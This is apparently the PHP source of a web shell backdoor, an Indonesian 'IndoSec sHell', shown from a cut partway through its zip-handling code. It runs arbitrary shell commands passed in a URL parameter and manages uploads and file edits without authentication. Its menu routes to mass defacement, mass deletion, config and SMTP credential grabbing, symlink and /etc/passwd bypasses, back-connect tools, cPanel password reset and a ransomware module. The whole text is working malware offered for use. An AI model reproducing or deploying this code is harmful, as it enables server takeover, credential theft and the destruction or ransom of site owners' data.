"; } exit; } function zipMenu($dir, $file) { //Compress/Zip $exzip = basename($dir).'.zip'; function Zip($source, $destination) { if (extension_loaded('zip') === true) { if (file_exists($source) === true) { $zip = new ZipArchive(); if ($zip->open($destination, ZIPARCHIVE::CREATE) === true) { $source = realpath($source); if (is_dir($source) === true) { $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST); foreach ($files as $file) { $file = realpath($file); if (is_dir($file) === true) { // $zip->addEmptyDir(str_replace($source . '/', '', $file . '/')); } elseif (is_file($file) === true) { $zip->addFromString(str_replace($source.'/', '', $file), file_get_contents($file)); } } } elseif (is_file($source) === true) { $zip->addFromString(basename($source), file_get_contents($source)); } } return @$zip->close(); } } return false; } //Extract/Unzip function Zip_Extrack($zip_files, $to_dir) { $zip = new ZipArchive(); $res = $zip->open($zip_files); if ($res === true) { $name = basename($zip_files, '.zip').'_unzip'; @mkdir($name); @$zip->extractTo($to_dir.'/'.$name); return @$zip->close(); } else { return false; } } echo '

Zip Menu

'; if ($_POST['upnun']) { $filename = $_FILES['zip_file']['name']; $tmp = $_FILES['zip_file']['tmp_name']; if (move_uploaded_file($tmp, "$dir/$filename")) { echo Zip_Extrack($filename, $dir); unlink($filename); $swa = 'success'; $text = 'Berhasil Mengekstrak Zip'; swall($swa, $text, $dir); } else { echo 'Gagal!'; } } echo "
Zip Backup
"; if ($_POST['backup']) { $fol = $_POST['folder']; if (Zip($fol, $_POST['folder'].'/'.$exzip)) { $swa = 'success'; $text = 'Berhasil Membuat Zip'; swall($swa, $text, $dir); } else { echo 'Gagal!'; } } echo "
Unzip Manual
"; if ($_POST['extrak']) { $zip = $_POST['file_zip']; if (Zip_Extrack($zip, $dir)) { $swa = 'success'; $text = 'Berhasil Mengekstrak Zip'; swall($swa, $text, $dir); } else { echo 'Gagal!'; } } echo '
'; } ?> { IndoSec sHell }

{ INDOSEC }

Shell Backdoor
Home Upload Buat File Buat Folder Mass Deface Mass Delete Jumping Config Adminer Symlink Network Auto Reset Cpanel Auto Edit User Ransomware SMTP Grabber Bypass Cloud Flare Zip Menu About Us keluar

Terminal :
Informasi :
PHP :
IP Server :
HDD Total : Free : [%]
Domain :
MySQL :
cURL :
Mailer :
Disable Function :
Software :
Sistem Operasi :
window.location="?";'; } //cmd if (isset($_GET['cmd'])) { echo "
".exe($_GET['cmd']).'
'; exit; } //about if (isset($_GET['about'])) { about(); } //upload if ($_GET['aksi'] == 'upload') { aksiUpload($dir); } //openfile if (isset($_GET['file'])) { $file = $_GET['file']; } $nfile = basename($file); //chmod if ($_GET['aksi'] == 'chmod_file') { chmodFile($dir, $file, $nfile); } //buat_file if ($_GET['aksi'] == 'buat_file') { buatFile($dir, $imgfile); } //view if ($_GET['aksi'] == 'view') { view($dir, $file, $nfile, $imgfile); } //edit if ($_GET['aksi'] == 'edit') { editFile($dir, $file, $nfile, $imgfile); } //rename if ($_GET['aksi'] == 'rename') { renameFile($dir, $file, $nfile, $imgfile); } //Delete File if ($_GET['aksi'] == 'hapusf') { hapusFile($dir, $file, $nfile); } $ndir = $_GET['target']; //chmod if ($_GET['aksi'] == 'chmod_dir') { chmodFolder($dir, $ndir); } //Add Folder if ($_GET['aksi'] == 'buat_folder') { buatFolder($dir, $imgfol); } //Rename Folder if ($_GET['aksi'] == 'rename_folder') { renameFolder($dir, $ndir, $imgfol); } //Delete Folder if ($_GET['aksi'] == 'hapus_folder') { deleteFolder($dir, $ndir); } /* * Fungsi_Tambahan * * * Mass Deface * IndoXploit */ if ($_GET['aksi'] == 'masdef') { aksiMasdef($dir, $file, $imgfol, $imgfile); } /* * mass delete * IndoXploit */ if ($_GET['aksi'] == 'masdel') { aksiMasdel($dir, $file, $imgfol, $imgfile); } /* * Jumping * IndoXploit */ if ($_GET['aksi'] == 'jumping') { aksiJump($dir, $file, $ip); } //Config if ($_GET['aksi'] == 'config') { aksiConfig($dir, $file); } //Bypass etc/passwd if ($_GET['aksi'] == 'passwbypass') { aksiBypasswd($dir, $file); } //Adminer if ($_GET['aksi'] == 'adminer') { aksiAdminer($dir, $file); } /* * Symlink * Kuda Shell */ if ($_GET['aksi'] == 'symlink') { aksiSym($dir, $file); } if ($_GET['aksi'] == 'symread') { aksiSymread($dir, $file); } if ($_GET['aksi'] == 'sym_404') { sym404($dir, $file); } if ($_GET['aksi'] == 'sym_bypas') { symBypass($dir, $file); } /* * Back Connect * Kuda Shell */ if ($_GET['aksi'] == 'bctools') { bcTool($dir, $file); } /* * Bypass Disable Function * Kuda Shell */ if ($_GET['aksi'] == 'disabfunc') { disabFunc($dir, $file); } /* * Auto Reset Cpanel * IndoSec -Fauzan- */ if ($_GET['aksi'] == 'resetpasscp') { resetCp($dir); } /* * Auto Edit User * IndoXploit */ if ($_GET['aksi'] == 'auteduser') { autoEdit($dir, $file); } /* * Ransomware * IndoSec */ if ($_GET['aksi'] == 'ransom') { ransom($dir, $file); } /* * SMTP Grabber * IndoXploit */ if ($_GET['aksi'] == 'smtpgrab') { scj($dir); } //Bypass Cloud Flare if ($_GET['aksi'] == 'bypascf') { bypasscf(); } /* * Zip Menu * IndoSec -Rizsyard- */ if ($_GET['aksi'] == 'zip_menu') { zipMenu($dir, $file); } $dirs = explode('/', $dir); echo 'Path : '; foreach ($dirs as $id=>$pat) { if ($pat == '' && $id == 0) { $a = true; echo '/'; continue; } if ($pat == '') { continue; } echo ''.$pat.'/'; } $scandir = scandir($dir); echo '  [ '.w($dir, perms($dir)).' ]'; ?>
"; } foreach ($scandir as $dirb) { $dtime = date('d/m/y G:i', filemtime("$dirb/$dirx")); /* cek jika ini berbentuk folder */ /* cek jika nama folder karaker terlalu panjang */ if (strlen($dirb) > 18) { $_dir = substr($dirb, 0, 18).'...'; } else { $_dir = $dirb; } if (!is_dir($dir.'/'.$dirb) || $dirb == '.' || $dirb == '..') { continue; } ?> 25) { $_file = substr($file, 0, 25).'...-.'.$ext; } else { $_file = $file; } /* set image berdasarkan extensi file */ $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); ?>
File/folder Size Last Modified Permission Action
Direktori kosong
-- ".perms($dir.'/'.$dirb).''; ?>       
".perms($dir.'/'.$file).''; ?>                       
Copyright 2019 { IndoSec }